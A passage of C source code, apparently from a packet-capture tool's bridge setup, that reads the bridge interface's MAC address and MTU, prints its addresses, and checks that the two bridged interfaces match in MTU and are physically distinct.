memcpy(GBL_BRIDGE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN); else DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface_bridge); /* get the MTU */ GBL_BRIDGE->mtu = get_iface_mtu(GBL_OPTIONS->iface_bridge); if (GBL_BRIDGE->mtu > INT16_MAX) FATAL_ERROR("MTU too large"); USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface_bridge, mac_addr_ntoa(GBL_BRIDGE->mac, pcap_errbuf)); USER_MSG("%16s ", ip_addr_ntoa(&GBL_BRIDGE->ip, pcap_errbuf)); USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_BRIDGE->netmask, pcap_errbuf) ); /* some sanity checks */ if (GBL_BRIDGE->mtu != GBL_IFACE->mtu) FATAL_ERROR("The two interfaces must have the same MTU."); if (!memcmp(GBL_BRIDGE->mac, GBL_IFACE->mac, MEDIA_ADDR_LEN)) FATAL_ERROR("The two bridged interfaces must be phisically different"); }